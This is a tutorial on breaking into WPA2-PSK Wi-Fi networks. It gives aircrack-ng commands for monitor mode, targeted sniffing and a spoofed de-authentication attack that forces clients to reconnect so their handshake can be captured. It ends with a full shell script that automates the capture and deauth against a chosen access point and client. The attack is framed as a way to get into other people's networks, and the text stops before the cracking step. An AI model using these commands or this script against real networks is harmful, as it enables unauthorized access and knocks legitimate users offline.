
Hack WiFi Passwords

Almost all modern Wi-Fi routers use WPA2. WEP networks, and networks with WPS enabled, were much easier to break into because of flaws in their design. WPA2 fixed the cryptographic weaknesses of WEP (a WPA2 network that still has WPS enabled remains exposed through WPS), yet there are still ways into a WPA2-protected network. The standard practical attack against WPA2-Personal (pre-shared key) is an offline wordlist/dictionary attack against a captured four-way handshake: the handshake does not contain the password, but it lets us test candidate passwords offline, without sending anything to the router.

Changing MAC Address

Before starting you may want to change your MAC address, so that the capture and the deauth frames are not tied to your adapter's real hardware address. This step is optional. If you want to change your MAC address, follow the steps in this link.

Cracking WPA2

Cracking a WPA2 pre-shared key with a wordlist attack has two main parts:

  1. Capturing the four-way handshake

  2. Running the wordlist (brute-force) attack against the captured handshake

Capturing Network Handshake

Every 802.11 frame carries a source MAC address and a destination MAC address. In normal (managed) mode an adapter only passes up frames addressed to its own MAC or to the broadcast address, which is why we need monitor mode to see other devices' traffic. The same addressing is what makes the de-authentication attack later possible: in plain WPA2, management frames such as deauth are not authenticated (unless the network enforces 802.11w Protected Management Frames), so a deauth frame with the router's MAC as source and the client's MAC as destination is accepted by the client as if the router had sent it.

The frames are sent over the air, so anyone within range of the router can capture them, provided the wireless interface is in monitor mode. By default it is in managed mode and discards frames not addressed to it. To enter monitor mode, run these commands:

Note: To check the name of your wireless interface run iwconfig (or iw dev). In my case it is wlan1. Most modern adapters support monitor mode; if yours does not, you will need an external adapter that does. The deauth step later also requires a driver that supports packet injection, which not every adapter has.

$ ifconfig wlan1 down
$ airmon-ng check kill
$ airmon-ng start wlan1

The first command, `ifconfig wlan1 down`, brings the wireless adapter down. `airmon-ng check kill` kills processes that interfere with monitor mode (NetworkManager, wpa_supplicant and the like), so you will lose your internet connection; that is fine, it is not needed for the remaining steps. `airmon-ng start wlan1` puts the `wlan1` interface into monitor mode. Run `iwconfig` again to verify that the mode now reads Monitor, and note the new interface name. In my case it is `wlan1mon`.

We will use `airodump-ng` for packet sniffing.

$ airodump-ng wlan1mon

The output looks something like this:

(Screenshot: output of `airodump-ng wlan1mon`)

ESSID is the name of the network. BSSID is the MAC address of the access point. PWR is the received signal strength in dBm (closer to zero means a stronger signal). Beacons are the frames the access point broadcasts to announce its presence. #Data is the number of data frames captured from that network. CH is the channel the network operates on. MB is the maximum speed the network supports. The ENC, CIPHER and AUTH columns show the encryption type, cipher and authentication method; the rest of this guide assumes a network showing WPA2, CCMP and PSK, since a wordlist attack only makes sense against a pre-shared key.

Next, I run airodump-ng against only the highlighted network. Let's assume this is my target network.

$ airodump-ng --bssid 60:32:B1:XX:XX:XX --channel 1 --write wpa_handshake wlan1mon

This stores the sniffed frames in files whose names start with wpa_handshake. The --bssid argument restricts the capture to the target access point, and --channel locks the adapter to the channel we saw in the CH column; without it airodump-ng keeps hopping channels and would miss most of the handshake. The output looks like this:

(Screenshot: output of `airodump-ng --bssid 60:32:B1:XX:XX:XX --channel 1 --write wpa_handshake wlan1mon`)

You will see that a wpa_handshake-01.cap file is generated, containing all frames captured to and from the network (airodump-ng also writes a wpa_handshake-01.csv summary of the access point and its stations). The MAC addresses listed under STATION are the clients currently connected to the Wi-Fi network.

Now we wait for a client to connect (or reconnect). When airodump-ng captures the four-way handshake it announces it as "WPA handshake: <BSSID>" in the top-right corner of its output.

Rather than waiting, we can run a de-authentication attack: spoofed deauth frames force the client off the network, and when we stop the attack the client reconnects and performs a fresh four-way handshake, which we capture. This only works against a client that is already connected and within range of our adapter, and it fails against networks that enforce Protected Management Frames (802.11w), because the client then rejects unauthenticated deauth frames.

To perform a deauth attack on the client, open another terminal and type the following command, where -a specifies the BSSID of the network and -c the MAC address of the client we want to deauthenticate.
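As an added example (not from the original article, and not part of the aircrack-ng project), the following POSIX shell script ties the steps above together: it puts the adapter into monitor mode, sniffs the target, picks a connected client out of the CSV that airodump-ng's --write produces, sends deauth frames with aireplay-ng, and then checks whether the capture holds a handshake. The aireplay-ng --deauth line is my reconstruction from the -a and -c flags described above; the interface name, the sleep timings, the wpa_handshake prefix and the "(N handshake)" check via aircrack-ng are assumptions of this example, and the embedded CSV sample is constructed so the parser can be exercised offline.

```shell
#!/bin/sh
# Added example (not from the original article): automates the handshake
# capture described above with the aircrack-ng suite. Assumptions:
#   - run as root on Linux with aircrack-ng (airmon-ng, airodump-ng,
#     aireplay-ng, aircrack-ng) and coreutils `timeout` installed
#   - the adapter is wlan1 and airmon-ng renames it wlan1mon (check iwconfig
#     if your driver names it differently)
#   - no earlier wpa_handshake-01.* or scan-01.* files exist in the cwd
#   - the aireplay-ng --deauth invocation is reconstructed from the -a/-c
#     flags the text describes
# Usage: sh capture.sh wlan1 60:32:B1:XX:XX:XX 1 [CLIENT-MAC]

# Accept only a colon-separated MAC such as 60:32:B1:AA:BB:CC.
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Print the station (client) MACs that airodump-ng recorded as associated
# with BSSID $2 in the CSV file $1 (--write produces <prefix>-01.csv next to
# the .cap). The CSV holds an AP table, a blank line, then a station table
# whose 6th field is the BSSID the station is associated with, or
# "(not associated)". Matching is case-insensitive.
associated_stations() {
    target=$(printf '%s' "$2" | tr 'a-f' 'A-F')
    awk -F', *' -v bssid="$target" '
        { sub(/\r$/, "") }                         # airodump-ng writes CRLF
        /^Station MAC/ { in_stations = 1; next }   # start of the station table
        in_stations && NF >= 6 && toupper($6) == bssid { print $1 }
    ' "$1"
}

# Constructed sample in the airodump-ng CSV format (not a real capture),
# used by demo() so the parser can be run without any hardware.
sample_csv() {
    cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
60:32:B1:11:22:33, 2024-01-01 12:00:00, 2024-01-01 12:05:00,  1,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   6, Target,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-01-01 12:00:10, 2024-01-01 12:04:59, -50,       35, 60:32:B1:11:22:33,
AA:BB:CC:DD:EE:02, 2024-01-01 12:01:00, 2024-01-01 12:03:00, -70,        3, (not associated), Target
EOF
}

# Offline demo: which station in the sample is associated with the target AP?
demo() {
    tmp=$(mktemp)
    sample_csv > "$tmp"
    associated_stations "$tmp" 60:32:b1:11:22:33
    rm -f "$tmp"
}

# Kill interfering services, put $1 into monitor mode, print the monitor name.
start_monitor() {
    ifconfig "$1" down
    airmon-ng check kill >/dev/null
    airmon-ng start "$1" >/dev/null
    printf '%smon\n' "$1"
}

# Sniff the target in the background, knock the client off, then check
# whether the capture now holds a handshake. Returns 0 on success.
capture_handshake() {
    mon=$1; bssid=$2; chan=$3; client=$4; prefix=$5
    airodump-ng --bssid "$bssid" --channel "$chan" --write "$prefix" "$mon" \
        </dev/null >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5                                  # let airodump-ng settle on the channel
    # 5 bursts of deauth frames to the client, spoofed as coming from the AP
    aireplay-ng --deauth 5 -a "$bssid" -c "$client" "$mon"
    sleep 20                                 # give the client time to reconnect
    kill "$dump_pid"
    # aircrack-ng lists each network in the capture as "WPA (N handshake)"
    aircrack-ng "${prefix}-01.cap" </dev/null 2>/dev/null |
        grep -Eq 'WPA \([1-9][0-9]* handshake\)'
}

main() {
    iface=$1; bssid=$2; chan=$3; client=$4
    valid_mac "$bssid" || { echo "invalid BSSID: $bssid" >&2; return 1; }
    mon=$(start_monitor "$iface")
    if [ -z "$client" ]; then
        # No client given: sniff for 30 s and take the first associated station.
        timeout 30 airodump-ng --bssid "$bssid" --channel "$chan" \
            --write scan "$mon" </dev/null >/dev/null 2>&1
        client=$(associated_stations scan-01.csv "$bssid" | head -n 1)
        [ -n "$client" ] || { echo "no client seen on $bssid" >&2; return 1; }
    fi
    valid_mac "$client" || { echo "invalid client MAC: $client" >&2; return 1; }
    if capture_handshake "$mon" "$bssid" "$chan" "$client" wpa_handshake; then
        echo "handshake captured in wpa_handshake-01.cap"
    else
        echo "no handshake yet; rerun, or wait for the client to reconnect" >&2
        return 1
    fi
}

# Only run the live procedure when arguments are given; with no arguments the
# script just defines the functions (and demo) for offline use.
if [ "$#" -ge 3 ]; then
    main "$@"
fi
```

The live parts (start_monitor, capture_handshake) need root and a monitor-capable, injection-capable adapter; only valid_mac, associated_stations and demo run offline. If the client never reconnects within the wait, or the network enforces 802.11w, the script reports that no handshake was captured rather than pretending otherwise, which is the check worth having before spending hours on the wordlist step.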